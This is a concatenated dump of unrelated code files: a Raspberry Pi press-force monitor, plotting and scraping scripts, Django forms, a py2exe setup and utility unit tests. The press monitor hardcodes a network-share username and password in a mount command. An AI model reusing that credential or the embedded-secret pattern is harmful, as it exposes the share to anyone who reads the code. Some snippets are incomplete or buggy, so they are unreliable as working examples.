Graph()\n\n graph.addNode(1)\n graph.addNode(2)\n graph.addNode(3)\n\n\n graph.addWeightedEdge(1, 2, 5)\n graph.addWeightedEdge(2, 3, -10)\n graph.addWeightedEdge(1, 3, 2)\n\n\n \n solution = Dijkstra(graph)\n\n dist, path = solution.solver(1)\n print dist\n print path \n\n'''\n\n \n\n\n 
\n\n","sub_path":"Shortest-Path-Python/Dijkstra.py","file_name":"Dijkstra.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"90656397","text":"#!/usr/bin/env python\r\n\r\n'''\r\nThis script is built to run (((4))) LoadStar Load Cells with attached peripherals (channel LED and channel export button).\r\nThe script is easily scalable but due to the number of GPIO pins on a Raspberry Pi it is recommended that\r\nONE Raspberry Pi is assigned for every four load cells. To build another sensor set this script can easily be copied to a \r\nnew Pi hard drive and only a few parameters need to be changed:\r\n\r\n(1) Folder Location for each new cell\r\n(2) Thresholds for each cell channel\r\n(3) Press Number\r\n\r\nWith the exception of the thresholds, the parameters are changed in the function arguments at the very end of the script.\r\nThe Thesholds are labeled as constant values in the beginning of the script.\r\n'''\r\nfrom multiprocessing import Process\r\nimport time\r\nimport datetime\r\nimport serial\r\nimport os\r\nimport RPi.GPIO as GPIO\r\nfrom openpyxl import Workbook, formatting, styles\r\nfrom openpyxl.styles import Alignment\r\nfrom openpyxl.styles.borders import Border, Side, BORDER_THICK\r\nfrom openpyxl.chart import BarChart, Series, Reference\r\nfrom numpy import column_stack\r\n\r\n#Connect to Network Drive (Pi Must have a folder call EEC_Network in the /home/pi/ directory)\r\nos.system('sudo mount.cifs //eec-srv-16/Testing /home/pi/EEC_Network -o user=Testing,password=R3stricted#')\r\n\r\n'''\r\nInitializing time variables, stop_time is when the code will exit and shutdown the pi, local_time_init \r\ngets the time relative to the Pi timezone, and timestmp creates a time stamp that will be added to \r\nthe excel file name on export. 
\r\n'''\r\nstop_time = int(time.strftime('%H%M%S'))\r\nlocal_time_init = time.localtime()\r\ntimestmp = time.strftime('%m-%d-%Y_%H%M', local_time_init)\r\n\r\n#Initializing GPIO pins as INPUTs/OUTPUTs and stating their initial conditions\r\nINPUTS = [11, 12, 13, 15, 16, 18, 19, 22]\r\nOUTPUTS = [31, 33, 35, 37]\r\nGPIO.setmode(GPIO.BOARD) #Pins referred to as their board number\r\nGPIO.setwarnings(False) #Supresses Terminal Warning that is otherwise unavoidable\r\nfor i in INPUTS:\r\n GPIO.setup(i, GPIO.IN)\r\n GPIO.input(i)\r\nfor i in OUTPUTS:\r\n GPIO.setup(i, GPIO.OUT)\r\n GPIO.output(i, 0)\r\n\r\n#CONSTANTS\r\nThresh1 = 5 #Force Threshold for Press1\r\nThresh2 = 5 #Force Threshold for Press2\r\nThresh3 = 5 #Force Threshold for Press3\r\nThresh4 = 5 #Force Threshold for Press4\r\nShortSleep = 1 #Sleep after Pass\r\nLongSleep = 3 #Sleep after Fail\r\n\r\n'''\r\nDefining serial port function. Create new port by passing the path to the device into the function.\r\nThe path can be found by navigating to the dev folder (cd /dev), listing the contents of the folder (ls)\r\nand seeing what ttyUSB* devices are listed. A helpful linux command is to enter (ls ttyUSB* in place of ls)\r\nwhich will list only ttyUSB devices. \r\n'''\r\ndef serdev(a):\r\n b = serial.Serial(a, 9600, timeout = None)\r\n if b.isOpen() == False:\r\n b.open()\r\n return b\r\nser1 = serdev('/dev/ttyUSB0')\r\nser2 = serdev('/dev/ttyUSB1')\r\nser3 = serdev('/dev/ttyUSB2')\r\nser4 = serdev('/dev/ttyUSB3')\r\n\r\n#Taring Variable (init). 
Create new variable by passing the serial port into the function\r\ndef serinit(a):\r\n a.write(('W\\r').encode('utf-8'))\r\n a.flush()\r\n b = float((a.readline()).decode('utf-8'))\r\n return b\r\ninit1 = serinit(ser1)\r\ninit2 = serinit(ser2)\r\ninit3 = serinit(ser3)\r\ninit4 = serinit(ser4)\r\n\r\n#This function makes the respective LED flash 3 times to indicate excel export\r\ndef Export_Indicator(LED_Pin):\r\n for i in range(3):\r\n GPIO.output(LED_Pin, 1)\r\n time.sleep(0.25)\r\n GPIO.output(LED_Pin, 0)\r\n time.sleep(0.25)\r\n\r\n#Creating Empty Lists to Append Data to for Excel Calculation\r\n#PRESS 1\r\nForce1 = [] #Log of Forces/Operations\r\nPF1 = [] #Log of Operation Results (Pass/Fail)\r\n#PRESS 2\r\nForce2 = [] #Log of Forces/Operations\r\nPF2 = [] #Log of Operation Results (Pass/Fail)\r\n#PRESS 3\r\nForce3 = [] #Log of Forces/Operations\r\nPF3 = [] #Log of Operation Results (Pass/Fail)\r\n#PRESS 4\r\nForce4 = [] #Log of Forces/Operations\r\nPF4 = [] #Log of Operation Results (Pass/Fail)\r\n\r\n#Excel export function. 
A, B, C, and D are defined by the Press() function, later.\r\ndef Excel(a, b, c, d):\r\n #Create Data For Excel\r\n PCount = b.count(\"Pass\") #counts passes\r\n FCount = b.count(\"Fail\") #counts failures\r\n FPerc = ((FCount / len(b)) * 100) #creates a percentage of failures to total operations\r\n FAvg = sum(a) / len(a) #calculates average forced required for press fit\r\n #Start Workbook\r\n wb = Workbook()\r\n #Creating Sheet 1\r\n ws1 = wb.active\r\n ws1.title = d\r\n #Entering Headers\r\n ws1['A1'] = 'Force'\r\n #Turning Data Into An Array of Vectors (Columns in Excel)\r\n data_out1 = column_stack([a])\r\n #Writing to Excel\r\n for row in data_out1.tolist():\r\n ws1.append(row)\r\n ws1['C2'] = 'Total Pass'\r\n ws1['C7'] = 'Total Fail'\r\n ws1['C12'] = 'Percent Fail'\r\n ws1['C17'] = 'Average Force'\r\n ws1['E2'] = PCount\r\n ws1['E7'] = FCount\r\n ws1['E12'] = FPerc\r\n ws1['E17'] = '%.4f' %FAvg\r\n #Merging Cells\r\n ws1.merge_cells('C2:D3')\r\n ws1.merge_cells('E2:E3')\r\n ws1.merge_cells('C7:D8')\r\n ws1.merge_cells('E7:E8')\r\n ws1.merge_cells('C12:D13')\r\n ws1.merge_cells('E12:E13')\r\n ws1.merge_cells('C17:D18')\r\n ws1.merge_cells('E17:E18')\r\n #Creating Alignment Properties of Cells\r\n CELLS = ['A1', 'C2', 'E2', 'C7', 'E7', 'C12', 'E12', 'C17', 'E17'] #List of cells subject to alignment\r\n #For Loop to Align the Cells in CELLS\r\n for i in CELLS:\r\n ws1[i].alignment = Alignment(horizontal='center', vertical='center')\r\n #Defining Border Properties and Applying them with For Loops\r\n thick_border = Border(\r\n left=Side(border_style=BORDER_THICK, color='00000000'),\r\n )\r\n for j in range(17):\r\n ws1.cell(row = j + 2, column = 3).border = thick_border\r\n ws1.cell(row = j + 2, column = 3).border = thick_border\r\n j += 1\r\n for j in range(17):\r\n ws1.cell(row = j + 2, column = 6).border = thick_border\r\n ws1.cell(row = j + 2, column = 6).border = thick_border\r\n j += 1\r\n #Creating Bar Graph\r\n chart1 = BarChart()\r\n chart1.type = 
\"col\"\r\n chart1.style = 1\r\n chart1.title = None\r\n chart1.y_axis.title = 'Force'\r\n chart1.x_axis.title = ''\r\n ChartData = Reference(ws1, min_col=1, min_row=2, max_row=len(a)+1, max_col=1)\r\n chart1.add_data(ChartData, titles_from_data=None)\r\n chart1.legend = None\r\n chart1.height = 15\r\n chart1.width = 30\r\n ws1.add_chart(chart1, \"G5\")\r\n #Saving/Closing\r\n wb.save(c)\r\n\r\n'''\r\nPress function takes arguments in the form:\r\n\r\n(channel, serial port, BreakBeam Pin, Button Pin, LED Pin, taring variable, Threshold variable, Force List, PF list, excel file path, excel doc title)\r\n\r\nThe sleep.time command at the end is essential for making sure the CPU does run at 100% capacity. Run the htop command in the terminal\r\nto monitor CPU usage and play with this time to get maximum speed without running the CPU at 100%.\r\n'''\r\ndef Press(ch, ser, break_beam_pin, button_pin, LED_pin, tare, thresh, ForceList, PFList, file_path, title):\r\n try:\r\n local_time_init = time.localtime() #Initializing local time\r\n stop_time = int(time.strftime('%H%M%S')) #Initializing cutoff time\r\n while stop_time < 170000:\r\n local_time_init = time.localtime() #Initializing local time\r\n timestmp = time.strftime('%m-%d-%Y_%H%M', local_time_init) #Creating TimeStamp\r\n stop_time = int(time.strftime('%H%M%S')) #Initializing cutoff time\r\n cond = GPIO.input(break_beam_pin)\r\n but = GPIO.input(button_pin)\r\n GPIO.output(LED_pin, 0)\r\n if cond:\r\n ser.write(('W\\r').encode('utf-8'))\r\n ser.flush()\r\n data = float((ser.readline()).decode('utf-8')) - tare\r\n ForceList.append(data)\r\n if data >= thresh:\r\n print('%.4f' % data + ' lbs')\r\n print(str(title) + ' :Pass')\r\n print('')\r\n PFList.append('Pass')\r\n time.sleep(ShortSleep)\r\n elif data < thresh:\r\n print('%.4f' % data + ' lbs')\r\n print(str(title) + ' :Fail')\r\n print('')\r\n GPIO.output(LED_pin, 1)\r\n PFList.append('Fail')\r\n time.sleep(LongSleep)\r\n GPIO.output(LED_pin, 0)\r\n if but or 
stop_time == (165000 + (ch*2)):\r\n print('Exporting ' + str(title) + ' data to Excel...')\r\n Export_Indicator(LED_pin)\r\n Excel(ForceList, PFList, file_path + str(title) + '_' + str(timestmp) + '.xlsx', title)\r\n time.sleep(0.001)\r\n except KeyboardInterrupt:\r\n pass\r\n\r\n#Automatic shutdown at the end of the workday (5PM) as well as initializing the GPIO and serial ports and exporting daily data to excel\r\ndef ShutDown():\r\n ser1.close()\r\n ser2.close()\r\n ser3.close()\r\n ser4.close()\r\n GPIO.cleanup()\r\n os.system('sudo shutdown now')\r\n\r\n#Start up indicator\r\nfor i in OUTPUTS:\r\n GPIO.output(i, 1)\r\ntime.sleep(10)\r\nfor i in OUTPUTS:\r\n GPIO.output(i, 0)\r\n\r\n'''\r\nMain while loop. Will run until 5:00PM EST then end loop and proceed to shutdown.\r\nAdd a new press by passing Press(a, b1, b2, b3, c, d, e, f, g) with the appropriate values.\r\nThe multiproccessing package allows the press function with it's respective arguments to run on it's\r\nown core. This lets all 4 cells run simultaneously without interferring with eachother. \r\n\r\nPLEASE READ:\r\nThe file path points only to the folder where the file will be saved. 
The file name is built on export by \r\nthe press function!\r\n'''\r\nif __name__ == '__main__':\r\n p1 = Process(target = Press, args = (0, ser1, 12, 11, 31, init1, Thresh1, Force1, PF1, \"/home/pi/EEC_Network/RPi1/Press 1 - Reflector + Body/\", 'Press 1'))\r\n p2 = Process(target = Press, args = (1, ser2, 16, 13, 33, init2, Thresh2, Force2, PF2, \"/home/pi/EEC_Network/RPi1/Press 2 - Contact Ring + Body/\", 'Press 2'))\r\n p3 = Process(target = Press, args = (2, ser3, 18, 15, 35, init3, Thresh3, Force3, PF3, \"/home/pi/EEC_Network/RPi1/Press 3 - Endcap Pins + Endcap/\", 'Press 3'))\r\n p4 = Process(target = Press, args = (3, ser4, 22, 19, 37, init4, Thresh4, Force4, PF4, \"/home/pi/EEC_Network/RPi1/Press 4 - Tape Switch Pins + Tape Switch Body/\", 'Press 4'))\r\n p1.start()\r\n p2.start()\r\n p3.start()\r\n p4.start()\r\n p1.join()\r\n p2.join()\r\n p3.join()\r\n p4.join()\r\n\r\n#Call Shutdown Function\r\n#ShutDown()\r\n","sub_path":"OLD_SCRIPTS/pressMonitor_FirstAttempt.py","file_name":"pressMonitor_FirstAttempt.py","file_ext":"py","file_size_in_byte":10379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"84797013","text":"\"\"\"\nanalysis\n\n\"\"\"\nimport figsetup_exp_branch_sequence as figsetup\nimport numpy as np\nimport analysis\nimport glob\nimport pickle\nimport copy\nimport matplotlib.pyplot as plt\nimport itertools\nfrom matplotlib import cm as colormap\nfrom scipy import stats\nimport os\nimport functions as fncs\n\ndata_local = False\nexperiment='_'.join(__name__.split('_')[1:]).split('.')[0]\n# kwargs = {'experiment':'_'.join(__name__.split('_')[1:]).split('.')[0]}\ndpi=350\n\n#############################################################################\n# directories and filenames\n#############################################################################\n# directories\ndata_directory = 'Data/'\nif data_local:\n data_directory='Data local/'\ndirectory = 
data_directory+experiment+'/'\nfigure_directory = directory+'Figures/'\n# make figure directory if doesnt exist\nif os.path.isdir(figure_directory) is False:\n os.mkdir(figure_directory)\n\n# variables to load\nvariables = ['vtrace_df',]\nvariables_reload=['vtrace_df']\n\narrayfuncs = fncs.ArrayFunctions()\ndffuncs = fncs.DfFuncs()\n\n#############################################################################\n# load variables\n#############################################################################\n_g = globals()\ndef _load_variables(variables, global_variables=globals(), variables_reload=[], extension='.pkl'):\n '''\n '''\n for variable in variables:\n # check if exists\n exists = variable in globals()\n if (variable in variables_reload) or not exists :\n filename = variable\n _g[variable]=fncs._load_group_data(directory=directory, filename=filename)\n_load_variables(variables=variables, global_variables=_g, variables_reload=variables_reload)\n\n#####################################################################\n# average voltage trace, weak path dendrites in paired vs unpaired\n#####################################################################\ndef _vtrace_mean(vtrace_df=vtrace_df, figsetup=figsetup):\n # plot average voltage trace at soma and dendrite\n #------------------------------------------------\n figtype='vtrace_soma_mean_'\n figdf=figsetup.BuildFigDF()._trace_mean()\n\n # create column for sec_idx string to sort by which section was stimulated\n vtrace_df = dffuncs._to_string(vtrace_df, colnames=['path_1_sec_idx'])\n\n # truncate arrays to have same length for same sequence delay\n vtrace_df = vtrace_df.set_index(['Cm', 'path_1_syn_limit','path_1_nmda_ampa_ratio','branch_seg_L','path_1_delay', 'path_1_w_mean', 'path_1_sequence_direction', 'field', 'tree_key', 'path_1_sec_idx_str', 'seg_num'])\n # # vtrace_df = dffuncs._truncate_arrays(df=vtrace_df,)\n\n # vtrace_df['data_v'] = dffuncs._truncate_arrays(vtrace_df['data_v'])\n # 
figdf['fig_ymin']=-4\n # figdf['fig_dyticks']=1\n # figdf['fig_xmin']=0\n # figdf['fig_xmax']=60\n # vtrace_df['path'] = vtrace_df['path'].fillna('2')\n # vtrace_df = vtrace_df.set_index(['path_1_syn_num','field', 'tree', ])\n kwargs={'dt':1./40}\n array_funcs = [arrayfuncs._truncate_array]#[arrayfuncs._subtract_timeseries]\n array_funcs=[]\n array_func_kws = [{}]#[{'islice':slice(399, 400), 'axis':1}]\n figs, ax = fncs.PlotFuncs()._trace_mean(df=vtrace_df, figdf=figdf, variables='data_v',array_funcs=array_funcs, array_func_kws=array_func_kws, figformat='none', **kwargs) \n vtrace_df = vtrace_df.reset_index()\n # save figure\n #------------\n for fig_key, fig in figs.iteritems():\n fname = figure_directory+figtype+str(fig_key)+'.png'\n fig.savefig(fname, format='png', dpi=dpi) \n return figs, ax, vtrace_df, figdf\n\nfigs, ax, vtrace_df, figdf= _vtrace_mean()","sub_path":"analysis_exp_branch_sequence.py","file_name":"analysis_exp_branch_sequence.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"19234515","text":"from distutils.core import setup\r\nimport py2exe\r\nimport os\r\n\r\n\"\"\" list of data_files to pass to setup \"\"\"\r\nfiles = []\r\n\r\n\"\"\" list of directories to search for files \"\"\"\r\ndirs = ['.\\\\resources\\\\flags',\r\n '.\\\\resources\\\\icons',\r\n '.\\\\resources\\\\images',\r\n '.\\\\resources\\\\styles',\r\n '.\\\\resources\\\\translations']\r\n\r\n\"\"\" loop through the list of directiories and create data_file entries \"\"\"\r\nfor dirpath, dirnames, filenames in os.walk('.'): \r\n if dirpath in dirs:\r\n for filename in filenames:\r\n filepath = dirpath + '\\\\' + filename\r\n fileEntry = (dirpath, [filepath]) \r\n files.append(fileEntry)\r\n\r\n\"\"\" static entries go here\"\"\" \r\nfiles.append(('.', ['.\\\\config.ini']))\r\n\r\n\"\"\" build setup \"\"\"\r\nsetup(\r\n name=\"EUROBet 2016\",\r\n version=\"01.00.00\",\r\n 
description=\"A betting application for the sake of fun and brotherhood\",\r\n author=\"sza2mc\",\r\n windows=[{\"script\" : \"EUROBet2016.py\"}],\r\n data_files = files,\r\n options={\r\n \"py2exe\" : {\r\n \"dist_dir\" : \".\\\\bin\",\r\n \"includes\" : [\"sip\", \"pymssql\", \"_mssql\", \"decimal\", \"uuid\"],\r\n \"packages\" : [\"pymssql\", \"_mssql\"],\r\n \"dll_excludes\" : [\"MSVCP90.dll\"],\r\n \"bundle_files\" : 1,\r\n \"compressed\" : True\r\n }\r\n },\r\n zipfile = None\r\n )\r\n\r\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"508485394","text":"import aineural as ai\r\nfrom enum import Enum\r\n\r\ndef test_simple_feedforward_network():\r\n # low level neural net creation\r\n net = ai.NeuralNet()\r\n net.set_seed(101)\r\n net.add_input( id=0, value_type=int, range=[0,1])\r\n net.add_input( id=1, value_type=int, range=[0,1])\r\n net.add_node( id=2, inputs=[0,1], weights=None, bias=1.0)\r\n net.add_node( id=3, inputs=[0,1], weights=None, bias=1.0)\r\n net.add_output( id=4, inputs=[2,3], weights=None, value_type=int, range=[0,1], bias=1.0)\r\n print(net.describe())\r\n net.save('test.nn')\r\n\r\n net2 = ai.NeuralNet.load('test.nn')\r\n print(net2.describe())\r\n\r\n out = net.out([0,1])\r\n\r\n '''\r\n print(out)\r\n\r\n # load the neural net, result should be the same\r\n out2 = net2.out([0, 1])\r\n print(out2)\r\n\r\n # create same type of neural network using higher level functions\r\n net3 = ai.NeuralNet()\r\n net3.create_feed_forward(inputs=[2,int,[0,1]], outputs=[1,int,[0,1]], hidden_layers=[2], seed=101, bias=1.0)\r\n out3 = net3.out([0, 1])\r\n print(out3)\r\n\r\n # create a new environment\r\n env = ai.Env()\r\n inputs = [[0,0],[0,1],[1,0],[0,0]]\r\n env.create_classification_env(inputs=inputs, outputs=[[0],[1],[1],[0]])\r\n\r\n # train the neural network on that environment\r\n tr = 
NeuralNetTrainer()\r\n [winners, errors] = tr.train_by_evolution(env, initial_population=[net3], epochs=1000)\r\n print(winners[0].out(inputs))\r\n '''\r\n\r\nif __name__ == \"__main__\":\r\n test_simple_feedforward_network()\r\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"498973866","text":"# -*- coding: utf-8 -*-\n\nimport sys\n\npy = sys.version_info\npy3k = py >= (3, 0, 0)\n\nuni_list = []\nradicial_list = ('一一丨丶丿乙亅二亠人儿入八冂冖冫几'\n '凵刀力勹匕匚匸十卜卩厂厶又口囗土士夂夊夕大女子宀寸���'\n '尢尸屮山巛工己巾干幺广廴廾弋弓彐彡彳心戈戶手支攴文斗'\n '斤方无日曰月木欠止歹殳毋比毛氏气水火爪父爻爿片牙牛犬'\n '玄玉瓜瓦甘生用田疋疒癶白皮皿目矛矢石示禸禾穴立竹米糸'\n '缶网羊羽老而耒耳聿肉臣自至臼舌舛舟艮色艸虍虫血行衣襾'\n '見角言谷豆豕豸貝赤走足身車辛辰辵邑酉釆里金長門阜隶隹'\n '雨靑非面革韋韭音頁風飛食首香馬骨高髟鬥鬯鬲鬼魚鳥鹵鹿'\n '麥麻黃黍黑黹黽鼎鼓鼠鼻齊齒龍龜龠')\n\nif py3k:\n import pyunihan.database\n radicial_list = list(radicial_list)\nelse:\n import database\n radicial_list = list(radicial_list.decode('utf-8'))\n\ndef init():\n global uni_list\n if py3k:\n uni_list = pyunihan.database.uni_list\n else:\n uni_list = database.uni_list\n\ndef init_old():\n global uni_list\n fi = open(\"database\", \"r\").readlines()\n uni_list = {}\n \n for i in fi:\n i = i.strip(\"\\n\").split(\" \")\n uni_list[int(i[0][2:], 16)] = [\n radicial_list[int(i[2][:i[2].find(\".\")].replace(\"'\", \"\"))], i[1], i[2]]\n \n open(\"database.py\", \"w\").write(\"uni_list=%s\" % repr(uni_list))\n \ndef get_radical(char):\n \"\"\"Return chinese charater redical, TotalStrokes, RSUnicode\n *RSUnicode: Radical-Stroke Counts\n \n >>> init()\n >>> get_radical(\"我\")\n ['戈', '7', '62.3']\n \"\"\"\n if py3k:\n if not isinstance(char, str):\n char = char.decode('utf-8')\n else:\n if not isinstance(char, unicode):\n char = char.decode('utf-8')\n \n char = ord(char)\n return uni_list[char]\n \nif __name__ == '__main__':\n import time\n t = time.time()\n print(get_radical(\"我\"))\n print(get_radical(\"豺\"))\n print(time.time() - 
t)","sub_path":"pyunihan.py","file_name":"pyunihan.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"108091083","text":"from bs4 import BeautifulSoup\nfrom enums.enums import Stock, Status\nfrom helpers.redis_helper import RedisHelper\nfrom helpers.smtp_helper import *\nimport requests, json, re\nimport redis\n\nclass BaseHelper:\n\n def __init__(self):\n self.config = self._loadConfig()\n self.redis = RedisHelper()\n\n # Load data from config\n def _loadConfig(self):\n print(\"\\n ==> LOAD DATA FROM CONFIG \")\n with open('./config.json', 'r') as configJson:\n config = json.load(configJson)\n print(\"Loaded data from config...\")\n return config\n\n # Make request\n def makeRequest(self):\n print(\"\\n ==> MAKE REQUEST TO AMAZON \")\n URL = self.config[\"base_url\"]\n # To get user agent simply search my user agent in google\n headers = {\"User-Agent\": self.config[\"user_agent\"]}\n page = requests.get(URL, headers=headers)\n soup = BeautifulSoup(page.content, 'html.parser')\n print(\"Request successfully made to amazon...\")\n return soup\n\n # Get product title\n def getProductTitle(self, soup):\n print(\"\\n ==> GET PRODUCT TITLE \") \n title = str(soup.find(id=self.config[\"elements\"][\"product_title\"][\"target_value\"])\n .get_text()).replace(\"\\s\", \"\")\n print(\"Product title : \"+title)\n return title\n\n # Get product stock\n def getProductStock(self, soup):\n print(\"\\n ==> GET PRODUCT STOCK \")\n stock_text = str(re.search('[^\\s][a-zA-Z\\s]{7,30}', \n soup.find(id=self.config[\"elements\"][\"stock_text\"][\"target_value\"]).get_text())\n .group(0).replace('.', '')).replace(\" \", \"\")\n print(\"Product Stock : \"+stock_text)\n return stock_text\n\n # Get product price\n def getProductPrice(self, soup):\n print(\"\\n ==> GET PRODUCT PRICE \")\n # price_text = price_text.encode('ascii','ignore')\n price = str(re.search('[\\d,.]{1,9}[^\\s]', \n 
soup.find(id=self.config[\"elements\"][\"price_text\"][\"target_value\"]).get_text())\n .group(0).replace(\",\", \"\"))\n print(\"Product Price : \"+price) \n return float(price)\n\n # Get product price to cache\n def _getProductPrice(self, currentProductPrice):\n oldProductPrice = self.redis.getData(\"product_price\")\n if(oldProductPrice == None):\n self.redis.setDataWithExp(\"product_price\", currentProductPrice, 60*3)\n return currentProductPrice\n else:\n return float(oldProductPrice)\n\n # Get product price from cache and compare price\n def getAndComparePrice(self, currentProductPrice):\n oldProductPrice = self._getProductPrice(currentProductPrice)\n if(currentProductPrice < oldProductPrice):\n print(\"Success!! Price decrease observed. Its a good time to order :)\")\n return Status.SUCCESS\n else:\n print(\"Price still seems to be up :( ... Not a good time to order\")\n return Status.FAILURE","sub_path":"helpers/base_helper.py","file_name":"base_helper.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"19612082","text":"from itertools import combinations\n\n# enter word\nL = input()\n# enter the number of characters you want\nK = int(input())\n\nC = list(combinations(L, K))\nprint(C)\n\n# only puts the items with letter a on it in F\n# how it works: item in C is sent to c.\n# then checks if 'a' is in c.\n# it returns true if it is found.\nF = list(filter(lambda c: 'a' in c, C))\nprint(F)","sub_path":"Python/Hackerrank/Built-in Functions/Combinations2.py","file_name":"Combinations2.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"246711632","text":"from django import forms\nfrom django.forms import ModelForm\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.forms import User\nfrom .models import Cart,Orders\n\n\nclass 
UserRegistrationForm(UserCreationForm):\n class Meta:\n model=User\n fields=[\"username\",\"password1\",\"password2\",\"email\"]\n\nclass CartForm(ModelForm):\n class Meta:\n model=Cart\n fields='__all__'\n widgets = {\n 'product': forms.Select(attrs={'class': 'text_inp', 'placeholder': 'Product'}),\n 'user': forms.TextInput(attrs={'class': 'text_inp', 'placeholder': 'User'}),\n 'quantity': forms.TextInput(attrs={'class': 'text_inp', 'placeholder': 'Quantity'}),\n }\n\nclass OrderForm(ModelForm):\n class Meta:\n model=Orders\n fields=['address','product','user']\n widgets = {\n 'address': forms.TextInput(attrs={'class': 'text_inp', 'placeholder': 'Address'}),\n 'product': forms.Select(attrs={'class': 'text_inp', 'placeholder': 'Product'}),\n 'user': forms.TextInput(attrs={'class': 'text_inp', 'placeholder': 'User'})\n\n\n }","sub_path":"customers/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"125524766","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport unittest\nimport os\nimport time\nimport datetime\nimport uuid\n\nsys.path.insert(0, '/usr/local/bin/keytalk')\nimport util\n\n\nclass TestUtil(unittest.TestCase):\n\n def test_run_cmd_with_success(self):\n self.assertEquals(util.run_cmd('pwd'), os.getcwd())\n\n def test_run_cmd_with_error(self):\n self.assertRaises(Exception, util.run_cmd, 'nonexistent_command')\n\n def test_strip_json_comments(self):\n json_with_comments = '''\n [\n # number one\n 'first',\n // number two\n 2,\n \"three\"\n ]\n '''\n expected_json = '''\n [\n\n 'first',\n\n 2,\n \"three\"\n ]\n '''\n self.assertEquals(util.strip_json_comments(json_with_comments), expected_json)\n\n def test_parse_certs_with_success(self):\n self.assertEquals(len(util.parse_certs('3certs.pem')), 3)\n self.assertEquals(len(util.parse_certs('2certs1key.pem')), 2)\n\n def test_parse_certs_with_error(self):\n 
self.assertEquals(util.parse_certs('/non/existing/file/name'), [])\n self.assertEquals(util.parse_certs('3privkeys.pem'), [])\n\n def test_parse_keys_with_success(self):\n self.assertEquals(len(util.parse_keys('3privkeys.pem')), 3)\n self.assertEquals(len(util.parse_keys('2certs1key.pem')), 1)\n\n def test_parse_keys_with_error(self):\n self.assertEquals(util.parse_keys('/non/existing/file/name'), [])\n self.assertEquals(util.parse_keys('3certs.pem'), [])\n\n def test_same_file_with_success(self):\n # same file\n self.assertTrue(util.same_file(\"/etc/keytalk/apache.ini\", \"/etc/keytalk/apache.ini\"))\n # whitespace\n self.assertTrue(\n util.same_file(\"/etc/keytalk/apache.ini \", \" /etc/keytalk/apache.ini \"))\n # symlink\n os.system(\"ln -sf /etc/keytalk/apache.ini /tmp/apache-slink.ini\")\n self.assertTrue(util.same_file(\"/etc/keytalk/apache.ini\", \"/tmp/apache-slink.ini\"))\n # hardlink\n os.system(\"ln -f /etc/keytalk/apache.ini /tmp/apache-hlink.ini\")\n self.assertTrue(util.same_file(\"/etc/keytalk/apache.ini\", \"/tmp/apache-hlink.ini\"))\n\n def test_same_file_with_error(self):\n # different files\n self.assertFalse(util.same_file(\"/etc/keytalk/apache.ini\", \"/etc/keytalk/resept.ini\"))\n # different files (though same contents)\n os.system(\"cp -f /etc/keytalk/apache.ini /tmp/apache.ini\")\n self.assertFalse(util.same_file(\"/etc/keytalk/apache.ini\", \"/tmp/apache.ini\"))\n # directory\n self.assertFalse(util.same_file(\"/etc/keytalk/\", \"/etc/keytalk/\"))\n # not a file\n self.assertFalse(util.same_file(\"\", \"\"))\n\n def test_get_cert_validity_percentage_with_success(self):\n self.assertEqual(util.get_cert_validity_percentage(\n \"DemoProvider\", \"CUST_PASSWD_INTERNAL\"), 10)\n\n def test_get_cert_validity_percentage_with_error(self):\n self.assertRaises(\n Exception,\n util.get_cert_validity_percentage,\n \"DemoProvider\",\n \"invalid-service\")\n self.assertRaises(\n Exception,\n util.get_cert_validity_percentage,\n \"invalid-provider\",\n 
\"CUST_PASSWD_INTERNAL\")\n\n def test_get_keytalk_providers(self):\n self.assertEqual(util.get_keytalk_providers(), ['DemoProvider'])\n\n def test_get_keytalk_services(self):\n demo_provider_services = [\"CUST_PASSWD_INTERNAL\",\n \"CUST_CR_MYSQL\",\n \"CUST_ANO_INTERNAL_TESTUI\",\n ]\n self.assertEqual(\n sorted(\n util.get_keytalk_services('DemoProvider')),\n sorted(demo_provider_services))\n\n def test_censor_string(self):\n self.assertEqual(\n util.censor_string(\n 'Some secret text with lots of secrets',\n ['secret']),\n 'Some text with lots of s')\n self.assertEqual(util.censor_string('Some secret text with lots of hidden secrets', [\n 'secret', 'hidden']), 'Some text with lots of s')\n self.assertEqual(\n util.censor_string(\n 'Some !@#$%^&*()\\\\/ text with lots of !@#$%^&*()\\\\/s',\n ['!@#$%^&*()\\\\/']),\n 'Some text with lots of s')\n\n def test_populate_defaults(self):\n # given\n known_settings = {'VHost': {'required': True,\n 'dependencies': []},\n\n 'ServerName': {'required': False,\n 'dependencies': []},\n\n 'EmailNotifications': {'required': False,\n 'dependencies': [],\n 'default_value': False},\n\n 'EmailSubject': {'required': False,\n 'dependencies': ['EmailNotifications'],\n 'default_value': 'Apache certificate renewal'},\n\n 'EmailSubjectPostfix': {'required': False,\n 'dependencies': ['EmailSubject'],\n 'default_value': 'some_postfix'}}\n\n # whens/thens\n settings_dict = util.populate_defaults({}, known_settings)\n self.assertEquals(settings_dict, {'VHost': None,\n 'ServerName': None,\n 'EmailNotifications': False,\n 'EmailSubject': None,\n 'EmailSubjectPostfix': None})\n\n settings_dict = util.populate_defaults({'EmailNotifications': True}, known_settings)\n self.assertEquals(settings_dict, {'VHost': None,\n 'ServerName': None,\n 'EmailNotifications': True,\n 'EmailSubject': 